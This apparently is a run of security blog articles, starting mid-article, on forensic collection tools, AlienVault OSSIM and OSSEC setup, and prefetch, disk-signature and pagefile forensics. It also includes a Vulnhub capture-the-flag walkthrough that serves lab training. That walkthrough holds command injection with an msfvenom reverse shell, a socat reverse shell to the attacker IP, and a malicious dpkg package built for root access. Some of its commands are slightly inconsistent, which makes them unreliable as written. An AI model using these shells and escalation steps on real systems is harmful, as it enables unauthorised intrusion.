  • Secure-Complete: Picking this choice will create a memory dump, collects volatile information, and also creates a full disk image. All the information collected will be compressed and protected by a password.
  • Secure-Memory Dump: Picking this choice will create a memory dump and collects volatile data. All the information collected will be compressed and protected by a password.
  • Secure- Triage: Picking this choice will only collect volatile data. All the information collected will be compressed and protected by a password.

 

  • Complete: Picking this choice will create a memory dump, collects volatile information, and also creates a full disk image.
  • Memory dump: Picking this choice will create a memory dump and collects volatile data.
  • Triage: Picking this choice will only collect volatile data.

 

The process of data collection will begin soon after you decide on the above options. This might take a couple of minutes.



After, the process is over it creates an output folder with the name of your computer alongside the date at the same destination where the executable file is stored.

 


 

The output folder consists of the following data segregated in different parts.



 

These are few records gathered by the tool. You can check the individual folder according to your proof necessity. It collects RAM data, Network info, Basic system info, system files, user info, and much more.



CDIR (Cyber Defense Institute Incident Response) Collector

CDIR (Cyber Defense Institute Incident Response) Collector is a dataacquisition tool for the Windows operating system. The tool is created by Cyber Defense Institute, Tokyo Japan. The tool collects RAM, Registry data, NTFS data, Event logs, Web history, and many more.

You can download the tool from here.

Let’s begin by exploring how the tool works:

There are three options

1. To initiate the memory dump process (1: ON)

2. To stop the memory dump process and (2: OFF)

3. Exit (0: EXIT)

 

After successful installation of the tool, to create a memory dump select 1 that is to initiate the memory dump process (1:ON)

 


Soon after the process is completed, an output folder is created with the name of your computer alongside the date at the same destination where the executable file is stored.


 

Fast IR Collector

Fast IR Collector is a forensic analysis tool for Windows and Linux OS. It gathers the artifacts from the live machine and records the yield in the .csv or .json document.  Windows and Linux OS. This tool is created by SekoiaLab.

You can download the tool from here.

Let’s begin by exploring how the tool works:

You just need to run the executable file of the tool as administrator and it will automatically start the process of collecting data.

 


Results are stored in the folder by the named outputwithin the same folder where the executable file is stored.



Panorama

Panorama is a tool that creates a fast report of the incident on the Windows system.

You can download the tool from here.

Let’s begin by exploring how the tool works:

·         Run the Panorama.exe on the system.

·         Choose “Report” to create a fast incident overview.



The browser will automatically launch the report after the process is completed.


 

The report data is distributed in a different section as a system, network, USB, security, and others.

Triage

Triage is an incident response tool that automatically collects information for the Windows operating system. Triage-ir is a script written by Michael Ahrendt.

You can simply select the data you want to collect using the checkboxes given right under each tab. Triage IR requires the Sysinternals toolkit for successful execution.

Download here.

 

 

 

Let’s begin by exploring how the tool works:

·         Run the executable file of the tool.

·         Select "Yes" when shows the prompt to introduce the Sysinternal toolkit.



·         Click on “Run” after picking the data to gather.The process of data collection will take a couple of minutes to complete.

 


 

·         The data is collected in the folder by the name of your computer alongside the date at the same destination as the executable file of the tool.


 

IREC - IR Evidence Collector | Binalyze

IREC is a forensic evidence collection tool that is easy to use the tool. It is an all-in-one tool, user-friendly as well as malware resistant. This tool is created by Binalyze . A paid version of this tool is also available.
Download the tool from here.

Let’s begin by exploring how the tool works:

You can collect data by two means:

·         Collect evidence: This is for an in-depth investigation.

·         RAM and Page file: This is for memory only investigation

Here we will choose, "collect evidence.” for in-depth evidence. Click start to proceed further.

 


The process has been begun after effectively picking the collection profile.



The process is completed. You can analyze the data collected from the output folder.



The output will be stored in a folder named cases that will comprise of a folder named by PC name and date at the same destination as the executable file of the tool.



Here is the HTML report of the evidence collection.The HTML report is easy to analyze, the data collected is classified into various sections of evidence. You can also generate the PDF of your report.



DG Wingman

DG Wingman is a free windows tool for forensic artifacts collection and analysis. The tool is by DigitalGuardian. This tool collects artifacts of importance such as registry logs, system logs, browser history, and many more. Also allows you to execute commands as per the need for data collection.

You can download the tool from here.

Let’s begin by exploring how the tool works:

·         Run the executable file of the tool.

·         Use the command wingman.exe/h, this gives you a rundown of commands along with their capacities.

 


 

For example, in the incident, we need to gather the registry logs. We will use the command

wingman.exe -r


 

All the registry entries are collected successfully.



These are the amazing tools for first responders. And they even speed up your work as an incident responder. These tools come handy as they facilitate us with both data analyses, fast first responding with additional features.

SIEM Lab Setup: AlienVault

$
0
0

AlienVault OSSIM is an Open Source Security Information and Event Management (SIEM), which provides you the feature-rich open source SIEM complete with event collection, normalization, and correlation. OSSIM is a unified platform which is providing the essential security capabilities like: -

 

·         Asset discovery

·         Vulnerability assessment

·         Host Intrusion detection

·         Network intrusion detection

·         Behavioral monitoring

·         SIEM event correlation

·          

It is already loaded with the power of the AlienVault Open Threat Exchange (OTX). The open threat intelligence community provides community-generated threat intelligence and allows you to collaborate with them and also automates the process of updating your security infrastructure with threat data from any source.

AlienVault is very useful for monitoring your system security event or vulnerability and can help you to audit assessment security like PCI-DSS.

 



 

So, without wasting more time or much theory let’s begin the installation process.

AlienVault OSSIM ISO can be easily found on the AlienVault OSSIM product page.

 

Table of content

·         Prerequisites

·         Installation

·         Setup log monitoring interface

·         Web UI Access

 

Prerequisites

For the installation of AlienVault OSSIM, there are some minimum requirements as listed below.

 

§  VMware or Virtual Box

§  2 NIC (Network interface card) E1000 compatible network cards

(You can have multiple NICs for Log Management or network monitoring)

§  4 CPU cores

§  4-8GB RAM

§  60GB HDD

 

Installation

Once you've downloaded the AlienVault OSSIM ISO file, begin installation It on your virtual machine.

 

To install AlienVault OSSIM

 

·         In your virtual machine, create a new VM instance using the AlienVault OSSIM ISO as the installation source.

 

·         Complete the requirements of AlienVault as shown below.

 



 

Once you launch the new AlienVault instance, select Install AlienVault OSSIM 5.7.4 (64 Bit) and Hit Enter As shown below

 



 

The installation process takes you through a tour of setup options choose as per your requirements.

 

·         Select language that you want to use

 



 

Select your location

 



 

Configure the network by Assigning

As we have 1 or more Network interface cards choose one for the primary network interface card for the management server. The IP address will be used to access AlienVault OSSIM Web UI. We are going to use eth0 for the management and the rest of the network is connected to eth1.



 

Assign a Unique IP address to the server as shown below. If you don’t know what to use here, consult your network administrator.

 



 

Assign the Netmask of assigned unique IP address

 

 



 

Provide the Gateway: That indicates the gateway router, as known as the default router. All traffic goes outside your LAN is sent through this router.



 

Then the installation process takes you to set up a root password this will be used for the root login account in the AlienVault OSSIM login console.

 



 

Then on the next prompt set up your time zone as the final step.

And then it will install the base system. It takes quite long depends on your system speed as usually it takes 10-15 to finish the installation till then go get served you with a coffee ☕.

 



You can now login to the AlienVault OSSIM console with the root user and enter the password that you designated in the setup process.

 



 

Login with credentials of root account.

 

Setup log monitoring interface

 

After successfully login, you must configure the log management interface.

To set up a network interface for log management and scanning follow the steps as described below.

 

Click on System Preferences > Configure Network > Setup Network Interface > eth1 > IP address > netmask.

 

Go to System Preferences

 



 

Select Configure Network

 



 

Select Network Interface

 



 

Select eth1 for log management and scanning.

 



 

Assign a unique IP address to set up a network management interface.

 



 

Assign the netmask of the designated IP address.

 



 

And then come back to the AlienVault setup by selecting back and back and then select Apply all Changes as shown below.

 



 

Verify the changes that you have done if correct then select yes.

 



 

Now you have successfully set upped the Network interface for the log management !!!



 

Hmm 😃 !! you have successfully installed and set upped AlienVault in VMware.

 

Web UI Access

By completing the installation process, you can access the Web UI and setup your admin account.

To access Web UI, open up your favorite browser and visit to

 

https://192.168.1.70

 



 

Hold tight! this is not enough…..

Have patience 😉

In this article, we explained the installation and configuration process of AlienVault OSSIM.

In the next article, our focus will be on the configuration and integration of Rsyslogs and SSH plugins to AlienVault Server.

In the next article we will discuss how to send Ubuntu RSYS logs to AlienVault server and Manual configuration and installation of SSH plugin.

 

AlienVault: End user Devices Integration-Lab Setup (Part 2)

$
0
0

As logs never lie, it’s very important to aggregate and analyze the internal and external network logs constantly so that you can prevent a breach or perform incident response on time. In the previous article, we looked at the configuration and installation of AlienVault OSSIM.

The operating-system integration for AlienVault is based on window-centric for a Linux platform.

Let’s take a look at the involved process for gathering logs from Linux servers using AlienVault.

 

You can access the previous article from here: - AlienVault Lab setup

 

in this article, we will discuss how to send Ubuntu RSYS logs to the AlienVault server and the Manual configuration and installation of the SSH plugin.

 

So, without much theory let’s begin the integration process.

 

Table of content

·         Prerequisites

·         credentials

·         Integration of Rsyslog and SSH plugin to AlienVault OSSIM

 

Prerequisites

For the integration of Rsyslog and SSH plugin to AlienVault OSSIM, there are some minimum requirements as listed below.

 

§  Ubuntu 20.04 or later

§  Root privileges

 

Credentials

·         Ubuntu 20.04 IP: 192.168.1.8

·         AlienVault OSSIM IP: 192.168.1.70

·         OSSIM (CLI) user: root

·         OSSIM password: Designated by you on the time of server setup

 

Integration of Rsyslog and SSH plugin to AlienVault OSSIM

 

Ubuntu 20.04

Rsyslog is a software that is used for forwarding log messages in an IP network. It implements basic Syslog protocol and extends it with content-based filtering capabilities. It also supports different module outputs, flexible configuration options and adds features such as TCP for transport.

 

Make sure the Port 514 (UDP protocol) is both on the ubuntu 20.04 server-side and AlienVault OSSIM server is open, so that the logs can be forwarded via UDP on port 514

 

Open rsyslog.conf file and check whether it is including all configuration file or not

To do this enter the following command

 

cd /etc

nano rsyslog.conf

 


 

 

Uncomment the following line to include all configuration files.

 

$IncludeConfig /etc/rsyslog.d/*.conf

 



 

If this line by default is uncommented, then save and exit.

Now we forward the rsyslog logs to the AlienVault OSSIM server.

Create a new configuration file named alienvault.conf and add the following line as shown below:

 

nano alienvault.conf

*.* @192.168.1.70

 

Where 192.168.1.70 is OSSIM server IP.

 



 

To make the changes effective restart rsyslog service by following command:

 

/etc/init.d/rsyslog restart

 



 

OSSIM Server

Login to the OSSIM server Jailbreak the server to CLI as shown below

 



 

On the next prompt, it will ask you for permission to access the full command line select yes and continue.

 



 

 

Here we’re using tcpdump on the OSSIM server to see log communications between Ubuntu 20.04 and OSSIM by running tcpdump to capture the logs with the following command:

 

Tcpdump -i eth0 udp port 514

 



 

Let’s verify whether it is receiving logs from Ubuntu 20.04 server or not

 

Ubuntu 20.04

In the ubuntu machine, I m switching users by running the following command, and then after we will see the logs of switching users are reflected on the OSSIM server or not.

 

sudo su

 



 

Come back to the OSSIM server

OSSIM Server

Let’s check what happens here …

 



 

Hurrah !!! as we can see the log from the Ubuntu server has entered into the OSSIM server, then now we will redirect the logs sent to OSSIM into a file.

 

Now we’re going to configure the Filtration in the Rsyslog.

Todo this follow the below steps:

Head towards the rsyslog.conffile in the directory etc.

 

cd /etc

nano rsyslog.conf

 



 

In the section GLOBAL DIRECTIVES, the line“$IncludeConfig /etc/rsyslog.d/*.conf” by default it includes the whole config file of the system.

 



 

To filter specific rsyslog configurations and logs put some specific name  on the place of * to filter it easily as shown below:

For example:-

 

$IncludeConfig /etc/rsyslog.d/debian.conf

 



 

 

Now head towards to directory of rsyslog.d and create a configuration filedebian.conf

 



 

And enter the following rule into it:

 

If $fromhost-ip == ‘192.168.1.8’ then -/var/log/auth.log

&~

 

Then save and exit as shown below

 



 

Now we check that the logs of the ubuntu server are inserted correctly in auth.log or not.

Before we do rsyslog restart and then follow the below steps:

 

cd /var/log

/etc/init.d/rsyslog restart

tail -f auth.log

 



 

As we can see logs are started coming from the ubuntu server 😉

 

Now we move on to the AlienVault part

OSSIM needs a plug-in t to connect any data source to the server. Plugins have XML based configuration.

The plugins have two elements: cfg and SQL

Let’s go to configure cfg

To do this head towards the directory /etc/ossim/agent/plugins

 

cd /etc/ossim

cd agent/

cd plugins/

 

in the directory of plugins, there are lots of plugins available that can be activated in OSSIM

we went on to modify one by hand for example SSH

To do this run the following command:

 

cp ssh.cfg debianssh.cfg

 



 

Then after open the debianssh.cfg configuration file.

 

nano debiannssh.cfg

 



 

And change the plugin id with your desired no. to make it identifiable for the further process.

Here I’m replacing plugin id 4003 to 9001 as shown below:

 


 

Now we can activate the plugin

Come back to AlienVault setup by entering the following command:

 

alienvault-setup

 



 

And then configure the sensor by below steps:

 

Select Configure Sensor > Configure Data Source Plugins > debianssh

 

Select Configure sensor

 



Select Configure Data Source Plugins

 



 

In the previous steps, we modified an SSH plugin into debianssh plugin. Select it in the list of plugins by pressing spacebar as shown below

 



 

And then come back to AlienVault Setup by selecting back option and then Apply All Changes

 



 

At last, it will ask for your permission to apply all changes

Select yes and then continue

 



 

On the next prompt, it will show you changes applied

 



 

 

Let’s go to configure the SQL part of the plugin.

Head towards to the directory of /usr/share/doc/ossim-mysql/contrib/plugins by entering the following command

 

cd /usr/share

cd /doc

cd /ossim-mysql

cd /contrib

cd /plugins

 

by running command ls you can see the examples of sql plugins

we’re going to copy the ssh.sql to debianssh.sql by running the following command:

cp ssh.sql debianssh.sql

 



 

Open the debianssh.sql file

 

nano debianssh.sql

 



 

Let’s do some modifications in the configuration file so that it can match the plugin.cfg to the SQL database.

The configuration looks like similar as shown below

 



 

Change the plugin id 4001 to 9001 or somewhat value of no. that you designated in the upper section as shown below:

 



 

As you can see this configuration file contains a predefined database of SSH logs so that if any suspicious SSH activity or request comes to the Ubuntu server it can match with that request.

And then Save and exit from the file.

 

Let’s put it into the action and activate the database be reconfiguring it.

 

To do this enter the following command:

 

ossim-db < debianssh.sql

ossim-db

select * from plugin where id = 9001;

quit

 



 

And at last reconfig the AlienVault OSSIM server by entering the following command:

 

alienvault-reconfig

 



 

On the next screen, it will start reconfiguring the server

 


 

If you are seeing this then congratulations...!!!

You successfully integrated Rsyslog and SSH plugin to the AlienVault OSSIMa server.

 

Hold tight! this is not enough…..

Have patience 😉

In this article, we explained the integration and configuration process of Rsyslog and SSH plugin to  AlienVault OSSIM.

In the next article, our focus will be on the configuration and installation of OSSEc Agents that send logs to AlienVault Server.

OSSEC is an open-source Host Intrusion Detection System (HIDS) that runs across multiple OS platforms such as Windows, Linux, Solaris. Mac …etc.

Maskcrafter: 1.1: Vulnhub Walkthrough

$
0
0

Introduction

Today we are going to crack this vulnerable machine called Maskcrafter: 1.1. It is created by evdaez. It is a simple Boot to root kind of challenge. We need to get root privilege on the machine and read the root flag to complete the challenge. Overall, it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover

o   Nmap

·         Enumeration

o   FTP Anonymous Login

o   Enumerating FTP for hints

o   Enumerating /debug directory

·         Exploitation

o   Crafting Payload using msfvenom

o   Exploiting the Command Injection

·         Post Exploitation

o   Enumerating MySQL database

o   Extracting cred.zip

o   Logging into SSH

o   Enumerating Sudo Permissions

o   Exploiting Sudo Permissions on custom script

o   Enumerating Sudo Permissions

o   Exploiting Sudo Permissions on socat 

·         Privilege Escalation

o   Enumerating Sudo Permissions

o   Crafting deb Installation Package using fpm

o   Installing the malicious package using dpkg

·         Reading Root Flag

Walkthrough

Network Scanning

To attack any machine, we need to find the IP Address of the machine. This can be done using the netdiscover command. To find the IP Address, we need to co-relate the MAC Address of the machine that can be obtained from the Virtual Machine Configuration Setting.  The IP Address of the machine was found to be 192.168.1.110



Following the netdiscover scan, we need a Nmap scan to get the information about the service running on the virtual machine. An aggressive Nmap scan reveals that 5 services: FTP (21), SSH (22), HTTP (80), RPC (111), NFS (2049).

nmap -A 192.168.1.110



Enumeration

Let’s start the enumeration stage with the FTP Service. It was clear from the Nmap Scan that FTP allows Anonymous Login. We got inside using it. We listed contents and found the pub directory. Inside the pub directories, we find 3 files. A NOTES.txt file, A zip file by the name of cred.zip, and a php file by the name of rce. Pretty convenient. Let’s download all the files to our local system to take a closer look.

ftp 192.168.1.110

Anonymous

ls

cd pub

ls

get NOTES.txt

get cred.zip

get rce.php



First, let’s check the NOTES.txt file. It said that there is a web directory by the name of /debug. It might contain a strong password. That makes bruteforce out of question. Also, the username is the admin that is confirmed in the note.

cat NOTES.txt



We went to take a look at the debug directory. We were greeted with a login panel. We knew the username was admin. We tried the admin as a password as well. We were in. That didn’t seem so hard. It contained the 3 commands that can be selected and executed.

http://192.168.1.110/debug/index.php



We used BurpSuite to capture the request to analyze how the commands are sent to the command to get executed. We saw that it is a simple parameter with a clear text command.



Exploitation

This meant that we can craft a payload using msfvenom in the Raw format and use it to exploit it to get a session.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.112 lport=1234 R



We copied the raw payload code and replaced the ifconfig command in the captured request in the Burp Suite as shown in the image below:



Before forwarding the request to the application, we start a netcat listener on the specified port from msfvenom i.e., 1234. After that, we forward the request and we see that we have a session on the target machine. We use the python one-liner to convert the shell into a TTY shell. The shell we have is of www-data user.

nc -lvp 1234

id

python -c 'import pty; pty.spawn("/bin/sh")'

id

Post-Exploitation

We start the enumeration with the /var/www/ directory. We have the debug directory that was mentioned earlier. We see that it contains a php file by the name of db.php. We open it to find the set of credentials for the Database.

ls

cat db.php



We then connect to the database using this set of credentials. After connecting, we list the databases. Among those mydatabase seemed interesting. We enumerated it further to find 2 tables by the name of creds and log in. We first listed all the contents of the creds table to find the zip password cred12345!!

mysql -u web -p

P@ssw0rdweb

show databases;

use mydatabase;

show tables;

select * from creds;



We went back to our local machine and used the credential that we just found to unzip the cred.zip file we got earlier. It contained a cred.txt. It read another set of credentials as shown in the image below.

unzip cred.zip

cat cred.txt



We use this set of credentials to log in as SSH.

Username: userx

Password: thisismypasswordforuserx2020

After logging in on the target machine via SSH, we used the Sudo -l command to list all the binaries that have the permission to run with elevated privileges. We found a script by the name whatsmyid.sh. It can be executed by the user evdaeez. We open the file in the nano editor.

ssh userx@192.168.1.110

sudo -l



We edit it to spawn a bash shell. It is as simple as writing /bin/bash in the script.

#!bin/bash

/bin/bash



We tried to execute the script using the sudo command with the u parameter. We see that we have the shell as evdaez. We again run the sudo -l command to check for any more binaries that could lead us to root. We see that socat has permission as user resercherx. Let’s get to resercherx user by exploiting this permission on socat. To do this we have a one-liner that executes socat. It requires a remote host and port. We first define these variables in the session. We define the RHOST variable with the local IP Address of our Kali Linux or attacker machine. Next, we define the RPORT variable with a random port number such as 12345. Then we will execute the socat as the user resercherx and variables that we just declared.

sudo -u evdaez /scripts/whatsmyid.sh

sudo -l

RHOSTS=192.168.1.112

RPORT=12345

sudo -u resercherx socat tcp-connection:$RHOST:$RPORT exec:/bin/sh.pty,stderr,setsid,sigint,sane



Before executing a one-liner, we start a socat listener to capture the session that might be generated from the target machine. As soon as the one line gets executed, we get a session on our local machine. Then we convert this shell into a TTY shell using the python script. Again, we ran the sudo -l command to check for binaries and their permissions. This time we have the sudo permissions on dpkg. We need to exploit this vulnerability to get root access to the machine.

socat file:’tty’,raw,echo=0 tcp-listen:12345

python -c ‘import pty;pty.spawn(“/bin/bash”)’

sudo -l



Privilege Escalation

The dpkg is used to install and manage packages. So, to get a root level shell from dpkg we need to provide it with a package to install. It will be of the malicious kind which can give us a shell. We get to our local machine to do this task. We searched dpkg on GTFOBINS and found a neat way to elevate privileges by dpkg. We need to craft a package using fpm and then that when installed with the help of dpkg it will grant us a root shell. First, we define a variable TF with the mktemp command which will create a temporary directory upon execution. Then we entered the shell invocation command into a shell file in the TF. Finally using the fpm, we crafted the contents of TF into a package. The resultant package was named x_1.0_all.deb. We ran the python script to create an HTTP server and transfer this deb file to the target machine.

TF=$(mktemp -d)

echo 'exec /bin/sh'> $TF/x.sh

fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

ls

python -m SimpleHTTPServer



Since we don’t have write permissions anywhere in the application, we went into the temp directory and downloaded the deb file using the wget command. Now, all there left is use dpkg with sudo to install the malicious deb file and we have the root shell. We confirm this using the id command. Then we can see that we have the root flag to conclude the machine.

cd /tmp

wget http://192.168.1.112:8000/s_1.0_all.deb

sudo dpkg -i x_1.0_all.deb

id

cd /root

ls

cat root.txt

 

Forensic Investigation : Prefetch File

$
0
0

In this article, we are going to study an important artifact of Windows, i.e. prefetch files. Everytime you do anything on your Windows system, a file is created. These files are called Prefetch files. Through this article, we will learn how these are important and why do we need them.

Table of Contents

·         Introduction

·         Forensic Analysis of Prefetch Files

o   WinPrefetch View

o   OS Forensic

o   PECmd

o   FTK Imager

Introduction

A Prefetch file is a file created when you open an application on your windows system. Windows makes a prefetch record when an application is run from a specific area for the absolute first time.

Prefetch files were introduced in Windows XP. Prefetch files are intended to accelerate the Windows boot process and applications' start-up process. In Windows XP, Vista, and 7 the number of prefetch files are limited to 128 whereas in Windows 8 and above it is up to 1024.

Proof of program execution can be a significant asset for a forensic investigator, they can prove that a certain executable was executed on the system to cover up the tracks. Before initiating the forensic analysis of the prefetch record as a forensic examiner you should check whether the prefetching process is enabled.

To check the status of prefetching, open the following location in Registry editor:

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

 


The value is set as 3 by default as shown in the image above. The following values can be changed according to your prefetching needs. All the options that windows provide us with in order to customize prefetching are explained below:

·         0:Prefetching Disabled

·         1:Application Prefetching Enabled

·         2: Boot Prefetching Enabled

·         3:Application and Boot both Enabled

The metadata that can be found in a single prefetch file is as following:

·         Executable's name

·         Eight character hash of the executable path.

·         The path of the executable file

·         Creation, modified, and accessed timestamp of executable

·         Run count (Number of time the application has been executed)

·         Last run time

·         The timestamp for the last 8 run time (1 last run time and other 7 other last run times)

·         Volume information

·         File Referenced by the executable

·         Directories  referenced by the executable

The prefetch files are saved under %SystemRoot%\Prefetch(C:\Windows\Prefetch). 


You can open the prefetch files location you can directly search for “prefetch “in the run command.

 


It can also be opened as a directory from the command prompt, which is a good news for all the command-line lovers.



Forensic Analysis of Prefetch Files

WinPrefetch View

WinPrefetch View is a tool to read and examine the prefetch files stored in your system. The tool was developed by Nirsoft. This utility deals with any variant of Windows, beginning from Windows XP to Windows 10.

You can download the tool from here.



You can easily open the details of a particular prefetch file by simply clicking on it. Here, I have opened HFS.EXE-D3CAF0BF.pf for a detailed view. It shows details such as created time, modified time, file size, the path of process run count, last run time, missing process.

 


OS Forensics

OS Forensic is a digital forensic tool, a complete package for forensic investigation by Passmark software. It is used to extract, analyze data, search files, recover deleted passwords, and recover deleted evidence, much more.

Download the tool from here.

 


Prefetch Explorer Command Line (PECmd)

PECmd is a command-line tool by Eric Zimmerman, used for bulk analysis of prefetch files.This tool can also export your prefetch artifacts to .csv and .css.

You can download the tool from here.

To begin with run the executable file. Let’s parse the prefetch file using this tool we will use the –d parameter to parse all the prefetch file.

PECmd.exe –d “C:\Windows\Prefetch”

 


In the image below, you can see the prefetch file for firefox.exe.The tool has parsed all the metadata as it has been explained in the introduction.

 


Similarly, through the following image, you can observe the prefetch file for
HFS.exe. Such files will be created for every application you access.



FTK Imager

As a Forensic Investigator, you can always access the prefetch files to understand the case given to you. Because through these files, it can be determined that what was frequently used on the system that you are investigating. This can be easily done with FTK Imager. FTK imager allows one to view and analyze the prefetch file present in the drive. To access the prefetch file through FTK, just open the said tool and look for the Prefetch folder in the left panel as highlighted in the image below:

This is all on prefetch files. Now that we understand these files properly, we can customize it, access it, and use it as we need. The most important thing to know about prefetch files is that it a boon when comes to retracing a malware as any .exe file that has been run on the system, will be logged in prefetch files. Therefore, if a malicious file is executed; you can track it through this.

Forensic Investigation: Disk Drive Signature

$
0
0

In this article, we will be using Disk Drive Signature to identify any suspicious changes in systems’ directories or files. Creating such signatures can help us protect our data in various ways.

Table of Contents

·         Introduction

·         Creating disk signature

·         Comparing disk signature

Introduction

A disk drive signature is created to identify the suspicious changes in your systems’ directories or files.This data incorporates information about a document's path, size, and other file attributes.

To create a disk drive signature, we will be using the OS Forensics tool by PassMark Software. OS forensic allows you to create, compare, and analyse a disk drive signature.

Let’s first check what all files are present there on the Desktop as we are going to create a disk signature on desktop only to get quick results. You can create a Disk drive Signature of any disk or folder present on your system as per your requirement.

We are going to create a signature for my desktop only. To begin with let’s first check the files present on the desktop so that you can get a clear idea after comparison of disk drive signatures.



 

 

Creating Disk Drive Signature

To create a Disk signature, download the OS Forensics tool if you haven’t already. You can download it from here. You can create the disk signature by selecting the options highlighted in the following screenshot.



Select the desired directory to create the signature. Here, I have selected Desktop, browse the directory, and click start.So, the signature for the data drive will be created.

 



 

It will ask for the File Name, enter the File Name and click on Save. Now the signature for the selected drive will be created. Select a file name for your signature as per your convenience I will be naming the first signature “old signature” and the other one “new signature”, just to be clear while comparing both the signatures.



Now you can perform some modifications in the data drive like deleting or editing some files anything that you want. You can also repeat the same steps to create another signature after making all the alterations in the information drive.



After creating the before and after signatures, select compare signature as highlighted in the following screenshot. Browse the old and new signature in the respective column and select compare. The comparison of the disk signature helps to find any changes in the drive.



 The result will show the files with their difference status, whether the file is deleted, modified, or created along with the date and time. The result of after comparison of both the disk drive signature shows a total of 7 differences; 4 new files, 2 deleted, and 1 modified file.



From the bottom right, as depicted in the picture, you can separately view the files of difference as you like. For instance, if you want to view all the deleted files altogether select deleted files from the drop-down column.


Creating and comparing the disk drive signatures helps to know suspicious changes in your system as it creates a snapshot of the directory structure of the drive at the point of creation

Forensic Investigation: Pagefile.sys

$
0
0

In this article, we will learn how to perform a forensic investigation on a Page File. There is a lot of information that can be extracted from valuable artifacts through a memory dump.Yet, there is more: you can perform memory forensics even without a memory dump that is by virtual memory analysis.

There are records on the drive that contain a few pieces of memory. These files are pagefile.sys, swapfile.sys, and hiberfil.sys. We will be moving forward with pagefile.sys.

 

Table of Contents

·         Introduction

·         Capturing the memory and pagefile using FTK imager

·         Analyzing using Belkasoft Evidence Centre

Introduction

The Pagefile.sys also referred to as a swap file or virtual memory file is utilized inside Windows operating frameworks to store information from the RAM when it turns out to be full. The pagefile.sys in Windows operating framework is located at C:\pagefile.sys. Windows OS supports up to 16 paging files; only one is used currently.

At whatever point you open an application in Windows, your PC will consume RAM. At the point when you have more applications open than the RAM on your PC can deal with, programs previously running in the RAM are moved to the Page file. This is known as Paging and implies the Page file goes about as reinforcement RAM, also known as virtual memory.

Capturing the memory and pagefile using FTK imager

We will use FTK Imager to capture the memory along with the pagefile.sys.

FTK® Imager is a tool for imaging and data preview FTK Imager also create perfect copies (forensic images) of computer data without making changes to the original evidence. You can download FTK imager from here.

Click on capture memory to create a memory dump.

  


The next step is to browse the destination path as you like, select the alternative “includepagefile” and click on Capture Memory.



The memory capture process will begin once you click on capture memory.



After completion of the process, the memory dump and page file will be carved in the destination folder previously selected.


Analyzing using Belkasoft Evidence Centre

Now to analyze the carved file we will be using the tool, Belkasoft Evidence Centre for analysis of the pagefile.sys. Belkasoft Evidence Centre is an all-in-one forensic tool for acquiring analyzing and carving digital evidence. You can download the free trial of the tool from here.

 First of all, let's create a new case. Fill in the case information, select the root folder, if you want, you can add a case description as well. Click on create and open to proceed further with the analysis. 

 



 

To analyze the captured memory (pagefile), select the option RAM Image; add the pagefile.sys file you carved previously as the evidence source using FTK imager.



Choose the desired data type you would like to search for. There are a whole lot of data types supported by the tool. Click finish afterward.



 

Here is the dashboard for the case after completion of the above steps. It shows proper segregated information about the data carved from the pagefile. A total of 1097 files have been carved, which includes URLs, pictures, and other artifacts.



The case explorer tab right next to the dashboard tab allows expanding and viewing each profile column. The data has been carved from browsers, pictures, system files, and other files as well.



Let’s expand and analyze the Browsers profile. It has carved the chrome history which consists of URLs, let’s check the chrome carved section for more details. It consists of the URLs for the sites visited, one of which is highlighted in the following screenshot.



Another in browsers profile is opera. Analyze the opera(carved) profile similarly, shows details about the URLs visited.



The carved data from pagefile also consists of some images. These images can be from the sites I have visited and other thumbnails.



The great feature of the belkasoft evidence center is it allows you to simply right on the picture and analyzes it for various aspects such as check skin, detect pornographic content from the picture, detect text, and also faces. All these aspects are useful during live analysis.



 

Some system files are also carved from the captured virtual memory, show the NetBIOS name, file path, and size.



 

The timeline tab shows the overall view of the data carved for easy analysis along with the time and URL of the search site visited.



A search results tab is also there in the tool which shows predefined search results. The following screenshot shows the search engine results along with the link and profile name. 

 

  


 

Similarly, you can perform the forensic investigation for hiberfil. Export the hiberfil.sys (stores the data while the windows system is on Hibernate mode) using FTK located at C:/hiberfile.sys and further analyze it using Belkasoft Evidence Centre.

The analysis of virtual memory files serves a great purpose for web browser forensic.


AlienVault: OSSEC (IDS) Deployment

$
0
0

In this article, we will discuss of Deployment of OSSEC (IDS) agents to the AlienVault server.

OSSEC is an open-source, host-based intrusion detection system (commonly called IDS) that market itself as the world’s most widely used intrusion detection system that performs or helps us to Monitor: -

·         Network Anomalies

·         Log analysis

·         Integrity Checking

·         Windows registry monitoring

·         Rootkit detection

·         Process monitoring

·         Real-time alerting

·         Active response

·         Policy monitoring

 Intrusion detection systems are customizable like a firewall and also, they can be configured to send alarm messages upon a rule’s instruction to automatically answer to the threat or warning as for your network or device.

OSSEC (IDS) can warn us against DDOS, brute force, exploits, data leak, and more external attacks. it monitors our network in real-time and interacts with us and with our system as we decide. It can be used to monitor one server or thousands of servers in a server/agent mode.

 

Table of content

For Linux

·         Prerequisites

·         Required dependencies

·         Download OSSEC source code

·         Extract & install OSSEC agent from source code

·         Installation of OSSEC HIDS Agent

·         Deploying OSSEC Agent to OSSEC server

·         Running OSSEC Agent

For windows

·         Download OSSEC agent for Windows

·         Install OSSEC agent

·         Generate OSSEC key for the agent

·         Run and verify OSSEC agent is connected or running

 

prerequisites

·         Ubuntu 20.04.1

·         Windows 10

·         Root or Admin privileges

 

For Ubuntu 20.04.1

 

Required Dependencies

To install OSSEC agent on Ubuntu 20.04.1 there are some requirement need to be installed before agent installation as listed below: -

·         GCC

·         Make

·         Libevent-dev

·         Zlib-dev

·         Libssl-dev

·         Libpcre2-dev

·         Wget

·         Tar

You can download this all requirement by simply running this command: -

 

apt install gcc make libevent-dev zlib1g-dev  libssl-dev libpcre2-dev wget tar

 

Download OSSEC source code

 

You can download the latest OSSEC source code from the Official release page of GitHub or simply running this command: -

 

wget https://github.com/ossec/ossec-hids/archive/3.6.0.tar.gz -P /tmp

 



 

Extract & install OSSEC agent from source code

 

Once the source download complete you can extract it by simply running this command

 

cd /tmp

tar xzf 3.6.0.tar.gz

 

In manner to install OSSEC agent navigate to the source code directory and run the installation script as shown below

 

cd ossec-hids-3.6.0/

./install.sh

 

 


Further then select your installation language or press ENTER to choose default installation options and follow the steps as described below: -

 



 

·         Specify the type of installation. In our case we are installing an OSSEC-HIDS agent, so we go with the option of agent.

·         Choose the installation path. By default, it is /var/ossec or you can define the path as per your environment.

·         Enter the OSSEC-HIDS server IP or AlienVault server IP.

